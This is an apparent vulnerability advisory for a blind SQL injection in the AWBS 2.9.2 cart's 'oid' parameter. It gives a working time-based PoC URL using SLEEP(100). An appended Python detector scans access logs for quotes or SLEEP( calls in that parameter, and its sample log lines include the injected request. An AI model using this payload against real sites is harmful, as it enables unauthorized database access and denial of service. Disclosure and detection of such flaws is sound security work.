AWBS 2.9.2 Blind SQL Injection 0day


    Affected version: AWBS 2.9.2
    Official website: http://www.awbs.com
    Vulnerability type: SQL injection
    Vulnerability description:
    ---Vulnerability---
    http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]
    =============================================================================================
    ---PoC Using Time-Based Blind SQL Injection---
    https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='
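
A detection sketch for the request shape above, added here as an example and not part of the original advisory: it scans web access logs for `/cart?ca=add_other` requests whose decoded `oid` value contains a quote character or a `SLEEP(` call. The combined log format, the sample log lines and the function name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /cart?ca=add_other&oid=1 HTTP/1.1" 200 512
198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /cart?ca=add_other&oid=1'%20AND%20SLEEP(100)=' HTTP/1.1" 200 512
198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /cart?ca=view HTTP/1.1" 200 300
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Assumption: a legitimate oid never contains a quote or a SLEEP( call.
SUSPICIOUS_RE = re.compile(r"['\"]|\bsleep\s*\(", re.IGNORECASE)


def suspicious_oid_requests(log_text):
    """Return (client_ip, decoded_oid) for add_other requests whose oid looks injected."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if url.path.rstrip("/") != "/cart":
            continue
        # parse_qs percent-decodes values, so %20 and %27 are seen as space and quote.
        params = parse_qs(url.query, keep_blank_values=True)
        if "add_other" not in params.get("ca", []):
            continue
        for oid in params.get("oid", []):
            if SUSPICIOUS_RE.search(oid):
                hits.append((ip, oid))
    return hits


if __name__ == "__main__":
    for ip, oid in suspicious_oid_requests(SAMPLE_LOG):
        print(f"{ip} sent suspicious oid: {oid!r}")
```

Matching on the decoded value matters because the quote and spaces in the PoC may arrive percent-encoded in the log.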